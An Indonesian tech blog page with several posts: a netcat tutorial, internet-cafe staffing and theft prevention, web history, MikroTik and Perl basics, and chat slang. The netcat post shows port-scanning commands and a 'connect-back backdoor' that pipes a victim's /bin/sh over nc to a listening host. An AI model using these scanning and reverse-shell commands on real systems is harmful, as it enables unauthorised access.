$ nc [-options] hostname port[s] [ports] ...

sedangkan untuk listen pada koneksi inbound, gunakan

$ nc -l -p port [-options] [hostname] [port]

Sekarang, kita akan menggunakan netcat sebagai tool untuk melakukan pengecekan terhadap sebuah remote host. Jika Anda menginginkan scanning pada port 1 sampai 1024, maka perintah yang diberikan adalah

$ nc -z -w 5 -n -v 234.56.78.9 1-1024
(UNKNOWN) [234.56.78.9] 631 (?) open
(UNKNOWN) [234.56.78.9] 113 (?) open
(UNKNOWN) [234.56.78.9] 80 (?) open
(UNKNOWN) [234.56.78.9] 25 (?) open

Gunakan double verbose (-v -v) untuk mendapatkan informasi tentang ports yang tertutup (refused)...

(UNKNOWN) [234.56.78.9] 5 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 4 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 3 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 2 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 1 (?) : Connection refused

Option -z dan -w 5 digunakan agar netcat tidak melakukan binding sebuah port dan menunggu lima detik untuk setiap koneksi. Option -n digunakan untuk tidak memanfaatkan fitur DNS resolve.

Untuk target ports, Anda dapat melakukan pembatasan hanya pada port tertentu saja.

$ nc -z -w 5 -n -v 234.56.78.9 21-25, 53, 80, 110-113, 443

Anda dapat melakukan scanning UDP ports dengan menambahkan option -u

$ nc -u -z -v -n 234.56.78.9 1-65335
(UNKNOWN) [234.56.78.9] 69 (?) open
(UNKNOWN) [234.56.78.9] 514 (?) open
(UNKNOWN) [234.56.78.9] 53 (?) open

Contoh untuk tingkat lanjut :
Pada penggunaan tingkat lanjut, netcat juga dapat digunakan sebagai
tool untuk melakukan transfer file. Sebagai contoh: Anda ingin
melakukan copy-transfer sebuah direktori dari host-A ke host-B .
Maka yang perlu Anda lakukan adalah:

* pada host-A

$ tar cvf - direktori/ | nc host-B 12345

* pada host-B

$ nc -l -p 12345 | tar xvf -

Anda juga dapat mengunakan netcat sebagai connect-back backdoor. :-)

* pada host-A, aktifkan 2 window dimana netcat dijalankan dengan LISTEN mode.

$ nc -l -p 12345 [ window-1 ]
$ nc -l -p 12346 [ window-2 ]

* pada host-B (yang menjadi victim)

$ nc -v host-B 12345 | /bin/sh | nc -v host-B 12346

Pada window-1 di host-A, Anda dapat mengetikkan perintah yang akan dijalankan pada host-B, dan kemudian melihat output dari perintah yang diberikan pada window-2 di host-A.




Read More for Netcat

Sistem Organisasi Warnet dan Tugasnya

*Pemilik Modal Warnet yaitu seseorang atau lebih, ataupun sebuah institusi atau lebih, yang menyediakan modal usaha baik uang, perangkat keras/lunak maupun tempat usaha bagi pendirian sebuah warnet. Dalam hal pendirian sebuah warnet, pemilik modal warnet diharapkan:
1. Pemilik Modal Warnet harus memperhatikan dan mengkaji dengan benar aspek-aspek sosial pada masyarakat sekitar tempat rencana pendirian warnet. Aspek sosial tersebut antara lain daya beli masyarakat, tingkat pemahaman masyarakat tentang Internet, kebutuhan masyarakat terhadap Internet dan strata sosial dan jenis komunitas yang berdekatan dengan warnet tersebut (perumahan, pendidikan atau bisnis).
2. Pemilik Modal Warnet harus memperhatikan dan mengkaji dengan benar dampak-dampak sosial yang mungkin terjadi pada masyarakat sekitar tempat rencana pendirian warnet. Dampak sosial tersebut antara lain dijadikannya warnet sebagai tempat melakukan/mengakses cybercrime, pornografi dan materi-materi yang tidak layak lainnya, serta menjadikan warnet sebagai tempat untuk menghabiskan uang dan waktu bagi anak-anak usia sekolah dengan melakukan chatting.
3. Pemilik Modal Warnet di dalam menunjuk seorang manager warnet, haruslah orang yang memahami benar tentang bisnis warnet dan teknologi Internet (software maupun hardware), memiliki kemampuan manajerial dan bisnis yang memadai, serta memiliki rasa tanggung-jawab dan peka terhadap kondisi sosial masyarakat sekitar.
4. Pemilik Modal Warnet bersama dengan manager, menyusun langkah-langkah strategis dalam mengembangkan warnet yang menguntungkan dari aspek bisnis dan tetap bertanggung-jawan dari aspek sosial.
5. Pemilik Modal Warnet menyediakan perangkat keras dan perangkat lunak yang memadai dan legal, serta menyiapkan tempat usaha yang aman dan kondusif.
6. Pemilik Modal Warnet menyediakan kesempatan berupa waktu dan biaya bagi manager dan admin untuk menambah pengetahuan mereka tentang Internet, baik melalui pelatihan khusus, workshop maupun seminar.
7. Pemilik Modal Warnet memberikan kompensasi yang memadai bagi operasional manager
8. Pemilik Modal Warnet melakukan koordinasi dengan manager.


*. Manager Warnet yaitu adalah seseorang yang bertanggung-jawab dalam menjabarkan strategi yang telah dirancang oleh pemilik modal dan merancang tindakan-tindakan taktis untuk dijalankan setiap harinya. Dalam hal perancangan tindakan taktis tersebut, manager warnet diharapkan:
1. Manager Warnet bertugas menyusun program-program promosi yang sifatnya edukatif dan positif terhadap para pelanggan warnet dan pengguna potensial dari masyarakat atau komunitas sekitar.
2. Manager Warnet bertugas memasang software yang dibutuhkan baik di komputer server maupun komputer client, baik software standar Internet maupun software filter pornografi.
3. Manager Warnet bertugas menetapkan aturan untuk menitipkan kartu identitas bagi para penyewa warnet, dan meminta admin warnet untuk mencatat secara rinci identitas penyewa warnet tersebut, jam masuk serta jam keluarnya. Dimungkinkan pula untuk membuat semacam registrasi anggota, sehingga penyewa yang telah menjadi anggota tidak perlu menunjukkan kartu identitasnya setiap kali menyewa, cukup hanya menunjukkan kartu anggotanya untuk dicatat nomor registrasinya.
4. Manager Warnet seharusnya memasang himbauan berupa pamflet atau brosur kepada penyewa warnet untuk tidak melakukan tindakan negatif semisal membuka pornografi dan aksi cybercrime.
5. Manager Warnet bersama dengan admin, menyusun metode keamanan untuk melindungi warnet dari ancaman kejahatan semisal perampokan ataupun pencurian piranti/peripherals komputer, serta menyusun langkah-langkah strategis dalam mengembangkan warnet yang menguntungkan dari aspek bisnis dan tetap bertanggung-jawab dari aspek sosial dan kepentingan penyewa/konsumen.
6. Manager Warnet didalam menunjuk seorang admin, haruslah orang yang memahami benar tentang operasional warnet dan teknologi Internet (software maupun hardware), memiliki kemampuan teknis yang memadai, serta memiliki rasa tanggung-jawab dan peka terhadap kondisi sosial masyarakat sekitar.
7. Manager Warnet di dalam memberikan kompensasi yang memadai bagi operasional admin.
8. Manager Warnet selalu melakukan koordinasi dengan pemilik modal dan admin.

*. Admin Warnet yaitu seseorang yang bertanggung-jawab sehari-hari dalam menjalankan aktifitas bisnis warnet secara operasional. Dalam aktifitas operasional tersebut, admin warnet diharapkan:
1. Admin Warnet bertugas membantu penyewa dalam mendapatkan kualitas Internet yang setara dengan yang dijanjikan atau uang yang dikeluarkan, serta memberikan kompensasi tertentu kepada penyewa apabila tidak dapat terlaksana, sesuai dengan program yang telah disusun bersama dengan manager.
2. Admin Warnet bertugas memahami dan mampu memfungsikan berbagai jenis software standar yang digunakan untuk Internet, termasuk software filter pornografi dan software pendeteksi software trojan/spy/keylogger.
3. Admin Warnet bertugas untuk menyediakan dan menerangkan informasi-informasi positif yang dibutuhkan oleh penyewa serta menjalankan program promosi yang telah disusun bersama dengan manager.
4. Admin Warnet bertugas memberi ketegasan kepada para penyewa untuk tidak melakukan aktifitas negatif melalui Internet, semisal cybercrime dan pornografi.
5. Admin Warnet bertugas meminta para penyewa untuk menitipkan kartu identitas atau kartu anggota mereka dan mencatatnya secara lengkap, termasuk waktu masuk dan keluarnya.
6. Admin Warnet harus Mewaspadai setiap penyewa warnet dan keadaan sekitar warnet untuk mengantisipasi setiap ancaman kejahatan semisal perampokan dan pencurian piranti/peripherals komputer, sesuai dengan metode keamanan yang telah disusun bersama dengan manager.
7. Admin Warnet bertugas tidak melakukan, memberitahu, memfasilitasi atau menganjurkan hal-hal yang dapat menimbulkan aktifitas cybercrime dan pornografi.
8. Admin Warnet selalu berkoordinasi dengan manager.

* Operator Warnet yaitu orang yang bertugas melayani user atau konsumen warnet setiap. Hal-hal yang harus diperhatikan antara lain :
1. Operator juga harus berusaha melayani sebaik-baiknya jangan chatting melulu.
2. Operator harus menjaga kebersihan ditempat kerjanya.
3. Operator harus bisa menjaga kenyamanan user.
4. Operator harustanggap terhadap user yang mengeluh atau komplain.
5. Operator harus selalu standby di tempat kerjanya saat bekerja.
6. Operator dalam melayani konsumen selalu tersenyum atau memberikan kesan yang baik.

Read More for Sistem Organisasi Warnet dan Tugasnya

Membangun Warnet

Hal-hal yang sebaiknya tidak dilupakan di dalam membangun warnet atau internet cafe antara lain sebaiknya :
1. Tempatnya jauh dari tempat yang berbahaya bagi kesehatan dan jauh dari lokasi yang rawan bencana alam
2. Ruangan warnet seharusnya memiliki ventilasi udara yang cukup, sehingga udara di dalam ruangan tidak terlalu lembab atau terlalu kering
3. Untuk antisipasi kebakaran memiliki minimal 2 pintu keluar-masuk.
4. Ada alat pengaman kebakaran, bisa berupa alarm, detektor asap, pemadam kebakaran otomatis ataupun minimal tabung pemadam kebakaran yang berisi dry powder
5. Pada area non-smoking, jika mengijinkan pengunjung merokok di dalam ruangan warnet
6. Ada kamar kecil yang terjaga kebersihannya
7. Sekat membatasi setiap komputer dibuat tidak terlalu tinggi / terlalu tertutup.
8. Usahakan melakukan perawatan AC secara berkala dan membersihkan karpet dengan penyedot debu, untuk mencegah merebaknya virus/kuman penyakit pernapasan, jika menggunakan AC dan berkarpet.

Read More for Membangun Warnet

Usaha Mencegah Pembobolan Warnet

Usaha-usaha yang dapat dilakukan untuk mencegah pembobolan warnet yang terjadi antara lain :
1. Jika dimungkinkan, laporkan keberadaan warnet atau lab komputer sekolah
kepada aparat keamanan terdekat agar memudahkan komunikasi jika suatu saat diperlukan
2. Beri tambahan sistem keamanan kovensional untuk melindungi sistem unit (cashing) dan monitor, misalnya meletakkan dalam sebuah meja yang didisain khusus, misalnya di dalam meja yang memiliki boks khusus dari plat besi yang kuat
3. Catatlah nomor seri monitor, harddisk dan motherboard, sehingga akan bermanfaat sebagai alat bantu pelacakan jika terjadi sesuatu yang tidak diharapkan
4. Berilah ciri-ciri yang khusus pada badan monitor dan cashing, misalnya dengan memberikan cap logo atau nama warnet/sekolah menggunakan cat yang tidak mudah dihapus
5. Pasanglah pengaman tambahan berupa alarm, baik alarm yang dipasang di tiap cashing ataupun alarm pintu/ruangan


6. Untuk lab komputer sekolah, jangan ijinkan sembarang orang untuk masuk lab, selain siswa-siswa yang memang sedang mengikuti praktikum dan atas pengawasan guru atau petugas lab
7. Untuk warnet, mintalah kepada para penyewa akses internet untuk menitipkan kartu identitas mereka dan catatlah data-data penyewa oleh admin warnet untuk disimpan jika suatu saat diperlukan
8. Usahakan untuk memiliki atau mengadakan pendekatan kepada tenaga pengamanan sipil lingkungan (hansip atau satpam) untuk senantiasa menjaga keliling lab komputer atau warnet, baik yang buka 24 jam ataupun tidak
9. Pilihlah seseorang yang benar-benar terpercaya dan jujur sebagai penanggung jawab lab komputer atau admin warnet
10. Asuransikan isi lab komputer dan warnet dari beberapa resiko semisal kebakaran dan pencurian, sehingga bila hal buruk terjadi maka tidak akan terlalu merugikan pemilik karena akan mendapatkan penggantian dari perusahaan asuransi

Read More for Usaha Mencegah Pembobolan Warnet

Asal Mula Web dan Browser

"Web adalah hasil dari sebuah kreasi suatu ruang informasi di mana sumber-sumber daya yang berguna diidentifikasi oleh pengenal global. Web menjadi komoditi yang diperebutkan oleh banyak pihak, sah-sah saja, mengingat salah satu aplikasi Internet yang populer adalah web.


Bahkan Microsoft dan Netscape sama-sama pernah berusaha membuat satu standarisasi web secara de facto. Untunglah, Berners-Lee bersama rekan-rekannya mendirikan World Wide Web Consortium (www.w3c.org) pada bulan Oktober 1994. W3C berhasil mencegah kalangan komersial mengambil-alih web. Kini beragam standarisasi web, seperti versi Hyper-Text Markup Language (HTML) dan Platform for Internet Content Selection (PICS), Cascading Style Sheet (CSS) dan eXtended Markup Language (XML) dirancang-bangun oleh W3C secara independen, tanpa ada tekanan dari manapun.

Kisahnya berawal ketika pada bulan Maret 1989, Berners-Lee, seorang lulusan Universitas Oxford berkebangsaan Inggris, mengajukan proposal tentang suatu sistem berbasis hypertext yang memungkinkan para peneliti fisika bisa berbagi informasi secara efisien dan efektif. Proposal tersebut diberi judul "HyperText and CERN". CERN merupakan nama tempat Berners-Lee bekerja saat itu, yaitu kependekan dari Conseil Europeen pour la Recherche Nucleaire, sebuah laboratorium riset bidang fisika partikel di Jenewa, Swiss. Pada penghujung tahun 1990, sebuah prototipe web berhasil dijalankan di sebuah perangkat komputer NeXT. Saat itu web sudah mengandung line-mode user interface yang disebut sebagai www. Esensi dasar sebuah web telah lahir!

Kemudian pada bulan Mei 1991, interface www tersebut mulai dipasang di mesin CERN dan dapat diakses melalui jaringan. Kemudian untuk pertama kalinya, tepatnya pada bulan Agustus 1991, informasi mengenai web tersebut disebarluaskan melalui newsgroup Usenet di alt.hypertext dan melalui newsletter CERN pada Desember 1991. Pada saat itulah web dan www mulai dikenal secara luas, meskipun masih mengunakan browser line-mode interface. Untuk berpindah dari satu halaman ke halaman lainnya, pengguna harus mengetikkan perintah-perintahnya.

Salah seorang pemerhati perkembangan web dan www tersebut adalah Marc Andreesen, seorang mahasiswa University of Illinois, yang gemar mengutak-atik perangkat keras dan lunak di laboratorium kampusnya, National Center for Supercomputing Applications (NCSA). Kemudian Andreesen bersama rekan-rekannya browser berdasarkan data-data dari CERN. Pada bulan Februari 1993 lahirlah browser graphical user interface (GUI) yang pertama. Informasi mengenai browser yang diberi nama Mosaic tersebut segera disebarluaskan melalui newsgroup. Mosaic merevolusi konsep tentang browser. Mosaic 1.0 secara resmi baru dirilis pada bulan November 1993, dengan menggabungkan berbagai aplikasi Internet seperti www, news, WAIS, e-mail dan tentu saja, kemampuan menampilkan gambar!

Bahkan hyperlink untuk pindah halaman telah berbentuk tulisan biru yang dapat di klik menggunakan mouse. Mosaic pun terjun dalam kiprah komersial. Pada April 1994, Jim Clark, pendiri Silicon Graphics, bersama dengan Andreseen mendirikan Mosaic Communication Corporation, yang kemudian berganti nama menjadi Netscape Corporation. Untuk selanjutnya, Mosaic dikembangkan oleh tim NCSA minus Andreseen, sedangkan Netscape Corporation mengembangkan Netscape. Saat itu, lisensi source code Mosaic, yang diberi kode SpyGlass, bisa ikut dimiliki oleh pihak lain.

Pada Desember 1994, lahirlah browser komersial yang pertama, Netscape 1.0 dari Netscape Corporation. Lantaran menyadari bahwa Netscape tersebut lahir dari dunia pendidikan, Netscape Corporation memutuskan mendistribusikan browser komersial mereka tersebut secara gratis khusus bagi kalangan pendidikan. Strategi ini menjadi kunci penting dalam perolehan pangsa pasar Netscape hingga 80% pada era tersebut.

Microsoft saat itu sedang tertidur pulas. IE 1.0 baru dirilis Agustus 1995, dalam bentuk Windows 95 Plus pack release yang komersial, alias tidak gratis. IE 1.0 tersebut berbasiskan pada source code Mosaic dengan lisensi SpyGlass. Bill Gates seperti tersambar petir ketika menyadari bahwa perkembangan Internet sedemikian pesat dan sedemikian penting, sama pentingnya dengan personal computer (PC) dan sistem operasi. Orang-orang tengah keranjingan Internet. Saat itu browser adalah Netscape.

Dalam sekejap, Bill Gates melakukan mobilisasi Microsoft dan mulai serius mengembangkan IE. Akhirnya, IE 3.0 dirilis pada bulan Agustus 1996 untuk berhadap-hadapan dengan Netscape. Bill Gates tidak mau tanggung-tanggung, mulai dari IE 3.0 tersebut, semua browser IE digratiskan sama sekali dan diikat dalam sistem operasi Windows. Hal tersebutlah yang akhirnya memicu perang browser, pengadilan anti-monopoli Microsoft dan runtuhnya dinasti Netscape.

Read More for Asal Mula Web dan Browser

Istilah Dalam Mikrotik

Istilah-istilah dalam mikrotik ini mungkin kita mendengar tapi tidak mengetahui apa itu PPP, GPS, dan masih banyak lagi. Istilah Dalam Mikrotik antara lain :
• System : Packet yang wajib diinstall karena merupakan inti dari system mikrotik.
• PPP : Untuk membuat Point to Point Protocol Server
• dhcp : Packet yang dibutuhkan apabila ingin membuat dhcp-server atau untuk mendapatkan dynamic ip address.
• Advanced tool : Tools tambahan seperti ip-scan, bandwidth test dan lainnya.
• arlan : Packet untuk konfigurasi chipset wireless aironet arlan
• gps : Packet untuk support GPS Device
• hotspot : Packet untuk membuat hotspot gateway, seperti authentication , traffic quota dan SSL
• hotspot –fix : Tambahan packet hotspot
• isdn : Packet untuk isdn server dan isdn client membutuhkan packet PPP
• lcd : Packet untuk customize port lcd
• ntp : Packet untuk ntp server dan ntp client
• radiolan : Driver for legacy RadioLAN cards.
• Routerboard : Routerboard spesifikasi BIOS
• Routing : Packet untuk routing OSPF, BGP dan static
• Routing-test : Packet tambahan ( optional )
• security : Packet untuk mendukung ssh dan ip sec.
• synchronous : Untuk synchronous dengan device lain
• telephony : Packet for VOIP ( H.323 )
• ups : packet for ups monitor seperti alarm
• user-manager : Packet tool user manager untuk radius server
• web-proxy : packet untuk setting proxy server
• web-proxy test : optional
• wireless : Packet untuk dukung cisco aironet cards

Read More for Istilah Dalam Mikrotik

Setting Proxy Mikrotik

Untuk melakukan setting proxy pada microtik dengan menggunakan web proxy ikutilah langkah-langkah berikut ini :
Setting Proxy Microtik

Setting Proxy Microtik

Setting Proxy Microtik

Read More for Setting Proxy Mikrotik

Belajar Perl

Perl adalah bahasa pemrograman untuk mesin dengan sistem operasi Unix (SunOS, Linux, BSD, HP-UX), juga tersedia untuk sistem operasi seperti DOS, Windows, PowerPC, BeOS, VMS, EBCDIC, dan PocketPC.

Permulaan belajar bahasa pemrograman perl sama seperti belajar bahasa pemrograman lainnya seperti php, linux dan masih banyak lagi. Pertama-tama kita akan mencoba membuat program helloworld terlebih dahulu, seperti berikut :

#!/usr/bin/perl
# contoh program helloworld
# ini adalah baris komentar
# nama program : helloworld.pl
print "helloworld !!!";
print "selamat datang di perl";


Bagaimana sangat simple bukan? Baris pertama adalah letak interpreter perl. Contoh diatas (#!usr/bin/perl) merupakan letak interpreter perl di unix/linux, jika anda menggunakan ms windows maka ubah sesuai path directory tempat anda menginstall perl. Pada kenya taannya anda bisa saja tidak menuliskan bari s tsb dan program tetap berjalan, namun ketika anda membuat script CGI maka bari s tersebut wajib dituliskan. Kemudian bari s kedua dari program diatas adalah bari s komentar, ya! komentar di perl ditandai dengan #, coba bedakan dengan baris pertama yang mana tanda # diikuti tanda !. Bari s yang dieksekusi oleh perl adalah bari s ke 4 dan 5, yaitu perintah print untuk menampilkan tulisan helloworld dan selamat datang di perl.

Variabel di dalam perl
Variabel di dalam perl ditandai dengan tanda $ , misalnya : $nama , $bilangan , dst. Seperti halnya pada bahasa pemrograman lain variabel di perl bersifat case-sensitive.
contoh penulisan variabel yang benar :

$Nama;
$X;
$nama_saya;
$nim1234;
$Hallo_123;

contoh penulisan variabel yang salah :
$ ---> Paling tidak harus diikuti sebuah huruf
$23saya --> harus diawali sebuah huruf bukan angka
$_hallo --> harus diawali sebuah huruf bukan garis bawah
$bulan-3 --> tidak boleh mengandung tanda minus



Tipe data skalar
Sedangkan untuk tipe data di perl terdapat dua jenis yaitu string dan numeric (kedua tipe ini dinamakan tipe skalar), hal ini mempermudah programmer perl karena kita tidak perlu lagi pusing memilih tipe data yang ingin digunakan di dalam program. Selain itu ketika membuat variabel kita tidak perlu menuliskan tipe data yang kita pakai, lalu bagaimana membedakan tipe string dan numeric? Untuk lebih jelas perhatikan contoh berikut :

#!/usr/bin/perl
# contoh variabel scalar di perl
# nama program : variabel.pl
# ini adalah contoh variabel yang bertipe string :

$nama = "Kadek";
$welcome_to = "\n perl emang keren \n";
$hello123 = ‘selamat datang di perl';

# sedangkan ini adalah contoh variabel bertipe numeric :

$hitung = 500;
$nomor_mahasiswa = 123040015;
$jumlah = 12;
$Hari_ke = 7;

print "$nama";
print "$Hari";
print "$welcome_to";
print "$hello123";
print "$hitung";
print "$nomor_mahasiswa";
print "$jumlah";
print "$Hari_ke";

Dari contoh diatas dapat disimpulkan bahwa variabel string ditandai dengan tanda petik tunggal(‘ ') dan petik dua/ganda (" ") , sedangkan untuk numeric langsung diisikan bilangan ke variabel tersebut tanpa tanda petik.

Apa bedanya petik tunggal dengan petik ganda ?
Bedanya petik tunggal tidak menghiraukan karakter karakter khusus seperti \n (newline), sedangkan petik ganda dapat membaca karakter khusus tersebut untuk lebih jelasnya kita coba saja dalam program.

#!/usr/bin/perl
# contoh program
# membedakan petik tunggal dan petik ganda
# nama program : tanda_petik.pl

$a = "\nprogrammer\n"; # petik ganda
$b = '\nprogrammer\n'; # petik tunggal

print "saya adalah $a";
print "\n"; # spasi
print 'saya adalah $b';
print "\n";

dengan kata lain petik tunggal akan menulis apa adanya , sedangkan petik ganda akan membaca karakter khusus.

Read More for Belajar Perl

Sabtu, 24 Mei 2008

Fungsi Utama Router

Router berfungsi utama sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya. Perbedaannya dengan Switch adalah kalau switch merupakan penghubung beberapa alat untuk membentuk suatu Local Area Network (LAN).


Router penggunaannya banyak dalam jaringan berbasis teknologi protokol TCP/IP, dan router jenis itu disebut juga dengan IP Router. Selain IP Router, ada lagi AppleTalk Router, dan masih ada beberapa jenis router lainnya. Internet merupakan contoh utama dari sebuah jaringan yang memiliki banyak router IP. Router juga dapat digunakan untuk menghubungkan banyak jaringan kecil ke sebuah jaringan yang lebih besar, yang disebut dengan internetwork, atau untuk membagi sebuah jaringan besar ke dalam beberapa subnetwork untuk meningkatkan kinerja dan juga mempermudah manajemennya. Router terkadang juga digunakan untuk mengoneksikan dua buah jaringan yang menggunakan media yang berbeda (seperti halnya router wireless yang pada umumnya selain ia dapat menghubungkan komputer dengan menggunakan radio, ia juga mendukung penghubungan komputer dengan kabel UTP), atau berbeda arsitektur jaringan, seperti halnya dari Ethernet ke Token Ring.

Router dapat digunakan juga untuk menghubungkan LAN ke sebuah layanan telekomunikasi seperti halnya telekomunikasi leased line atau Digital Subscriber Line (DSL). Router digunakan untuk menghubungkan LAN ke sebuah koneksi leased line seperti T1, atau T3, sering disebut sebagai access server. Sementara itu, router yang digunakan untuk menghubungkan jaringan lokal ke sebuah koneksi DSL disebut juga dengan DSL router. Router-router jenis tersebut umumnya memiliki fungsi firewall untuk melakukan penapisan paket berdasarkan alamat sumber dan alamat tujuan paket tersebut, meski beberapa router tidak memilikinya. Router yang memiliki fitur penapisan paket disebut juga dengan packet-filtering router. Fungsi router umumnya memblokir lalu lintas data yang dipancarkan secara broadcast sehingga dapat mencegah adanya broadcast storm yang mampu memperlambat kinerja jaringan.

Read More for Fungsi Utama Router

Folder Hidden di Flashdisk

Untuk memunculkan Folder yang di-hidden atau disembunyikan pada flashdisk dan folder system32 Windows harus dilakukan secara manual melalui DOS command prompt dengan perintah attrib.

attrib -r -h -s F:\*.* /s/d

F = drive untuk Flashdisk

atau dengan

- Klik [Start]
- klik [Run]
- Ketik [cmd]
- Tekan tombol [Enter]
- Kemudian masuk ke drive flashdisk, misalnya drive F dengan mengetik
F:
- Terus ketik
attrib -s -h /S /D

Dengan perintah tersebut di atas akan memunculkan file-file dan folder-folder yg di hidden, termasuk sub-sub folder di dalamnya serta file2 yang ada.

Kembalikan file ms.word yang disembunyikan oleh virus Decoy.A
- Klik [Start]
- klik [Run]
- Ketik [cmd]
- Tekan tombol [Enter]
- Ketik Attrib
–s –h C:\*.doc /s ,
- Tekan tombol [Enter]

Catatan:
Jika anda ingin mengembalikan data ms.word yang ada didrive lain
[contoh: D atau USB] tulis perintah diatas dengan mengganti lokasi drive yang akan diperiksa, dengan format Attrib –s –h %lokasi drive%:\*.doc /s
Contoh :
Attrib –s –h D:\*.doc /s

Read More for Folder Hidden di Flashdisk

Flashdisk found.000 atau File.chk

Jika anda mempunyai flashdisk yang terkena masalah dengan found.000 atau file.chk , 10.000 file(hidden) dan sudah di format di dos, pcmav, avg, pc cillin, di attrib, di del di dos, tetap tidak bisa terhapus.

Jenis file atau folder yang bernama found.000 dan file.chk merupakan log file yg dihasilkan dari windows check disk. Kemungkinan flashdisk tersebut mempunyai masalah di hardware(klo di hardisk biasa dikenal BAD SECTOR). Fungsi dari check disk adalah sebagai tanda agar sector(area)yg corrupt tidak ditulis kembali.

Jadi kemungkinan besar bukan virus tapi memang flashdisk nya udh banyak sector error.
Hal ini diperkuat juga dengan file2 tsb tidak dapat dihapus.

Kalau masih percaya itu merupakan virus, tinggal pindah komputer lalu scan pake komputer yang lain dgn antivirus lainnya.
Pasti resultnya sama, nggak bisa di hapus.. Ato sekalian di format pake LINUX biar afdol.

Cara benerinnya biasanya cukup dengan :
chkdsk /f /r drive:

Read More for Flashdisk found.000 atau File.chk

Rabu, 21 Mei 2008

Istilah Dalam Chating Yahoo dan MIRC

Istilah Dalam Chating Yahoo
? = Huh?
?4U = Question for you
2L8 = Too late
2U2 = To you too
4GM = Forgive me
4RL? = For real?
AAMOF = As a matter of fact
AAYF = As always, your friend


AFAIK = As far as I know
AFK = Away from keyboard
AKA = Also known as
ASAP = As soon as possible
ASL = Age, sex, location?
ASLP = Age, sex, location, picture?
ATM = At the moment
ATYS = Anything you say
AWA = As well as
B/C = Because
B4 = Before
B4N = Bye for now
BAC = Back at computer
BAK = Back at keyboard
BBIAB = Be back in a bit
BBL = Be back later
BBS = Be back soon
BC = Be cool
BCNU = Be seeing you
BD = Big deal
BF = Boyfriend
BFD = Big freakin' deal
BFN = Bye for now
BIL = Brother in law
BME = Based on my experience
BOT = Back on topic
BRB = Be right back
BRH = Be right here
BTDT = Been there, done that
BTW = By the way
BYTM = Better you than me
CMIIW = Correct me if I'm wrong
CU = See you
CUL = Catch you later
CUL8R = See you later
CUS = See you soon
CWOT = Complete waste of time
CYA = See ya
CYL = Catch ya later
DBEYR = Don't believe everything you read
DHYB = Don't hold your breath
DIIK = Darned if I know
DIY = Do it yourself
DQYDJ = Don't quit your day job
EAK = Eating at keyboard
EG = Evil grin
EOD = End of discussion
EOL = End of lecture
EOR = End of rant
F = Female
F2F = Face to face
FAQ = Frequently asked questions
FCOL = For crying out loud
FIL = Father in law
FITB = Fill in the blanks
FNB = Football and beer
FOCL = Falling off the chair laughing
FOFL = Falling on the floor laughing
FUBAR = Fed up beyond all recognition
FWIW = For what it's worth
FYA = For your amusement
FYI = For your information
G = Grin
G2G = Gotta go
GA = Good afternoon
GA = Go ahead
GAL = Get a life
GAS = Greetings and salutations
GBH = Great big hug
GE = Good evening
GF = Girlfriend
GFN = Gone for now
GG = Good game
GI = Good idea
GICBTS = Gosh, I can't believe that stuff!
GICNBY = Gosh, I cannot believe you!
GIWISI = Gee, I wish I said it
GJ = Good job
GL = Good luck
GM = Good morning
GM = Good move/match
GMTA = Great minds think alike
GN = Good night
GR8 = Great
GTG = Got to go
H = Hug
H/O = Hold on
H&K = Hugs and Kisses
HAGD = Have a good day
HAND = Have a nice day
HB = Hug back
HCIT = How cool is that?
HF = Have fun
HH = Ha-ha
HHSF = Ha-ha, so funny
HHVF = Ha-ha, very funny
HO = Hold on
HOAS = Hold on a second
HTH = Hope this helps
IAC = In any case
IAG = It's all good
IAGW = In a good way
IB2D = I beg to differ
IC = I see
IC = In character
IDGI = I don't get it
IDK = I don't know
IDNDT = I did not do that
IDNK = I do not know
IIRC = If I remember correctly
IK = I know
IKWUM = I know why you mean
IMAO = In my arrogant opinion
IME = In my experience
IMHBMAO = In my humble but most accurate opinion
IMHO = in my humble opinion
IMNSHO = in my not so humble opinion
INRS = It's not rocket science
IOW = In other words
IRL = In real life
IRSTBO = It really sucks the big one
IS = I'm sorry
ISWYM = I see what you mean
J/K = Just kidding
J/P = Just playing
JMHO = Just my humble opinion
JTLYK = Just to let you know
K = Okay
KIR = Keepin' it real
KISS = Keep it simple, stupid
KIT = Keep in touch
KWIM = Know what I mean?
KYSOTI = Keep your stick on the ice
L8R = Later
LMK = Let me know
LOL = Laugh out loud
LTNS = Long time, no see
LTR = Long term relationship
LYK = Let you know
LYLAB = Love you like a brother
LYLAS = Love you like a sister
LUM = Love you man
M = Male
M8 = Mate (friend)
ME2 = Me too
MIL = Mother in law
MMA = Meet me at
MMAMP = Meet me at my place
MOO = My own opinion
MYOB = Mind your own business
N = In
N/C = Not cool
N2M = Not too much
NBD = No big deal
NE1 = Anyone
NFW = No freakin' way
NLT = No later than
NM = Nevermind
NM = Not much
NMH = Not much here
NMJC = Nothing much, just chillin'
NNITO = Not necessarily in that order
NO1 = No one
NOTTOMH = Not off the top of my head
NOYB = None of your business
NP = No problem
NRN = No reply necessary
NVM = Nevermind
NW = No way
OIC = Oh, I see
OMG = Oh my gosh
OMOHOD = One minute, one hour, one day
ONNA = Oh no, not again
OOC = Out of character
OT = Off topic
OT = Other topic
OT = Over time
OTOH = On the other hand
PIMP = Pee in my pants
PLZ = Please
POS = Parent over shoulder
PPL = People
QT = Cutie
RESQ = Rescue
RFC = Request for comment
RHIP = Rank has its privileges
ROF = Rolling on the floor
ROTFL = Rolling on the floor laughing
RTFM = Read the flippin' manual
S/B = Should be
S2R = Send to receive
SCNR = Sorry, could not resist
SIL = Sister in law
SK8 = Skate
SLY = Still love you
SOS = Same old stuff
SOS = Sibling over shoulder
SOS = Someone special
SSDD = Same stuff, different day
STR8 = Straight
SWAK = Sealed with a kiss
SWALK = Sweet, with all love, kisses
SWDYWTTA = So what do you want to talk about?
SYSOP = System Operator
TBC = To be continued
TC = Take care
TC = That's cool
TCO = Taken care off
TGIF = Thank goodness it's Friday
TIA = Thanks in advance
THX = Thanks
TMA = Take my advice
TMI = Too much information
TNX = Thanks
TOH = The other half
TTFN = Ta ta for now
TTYL = Talk to you later
TTYS = Talk to you soon
TTYVS = Talk to you very soon
TWIMC = To whom it may concern
TY = Thank you
TYVM = Thank you very much
U2 = You too
UR = You are
UR = Your
URSKTM = You are so kind to me
VBG = Very big grin
W/ = With
W/E = Whatever
W/O = Without
W2F = Way too funny
W8 = Wait
W8AM = Wait a minute
WAEFRD = When all else fails, read directions
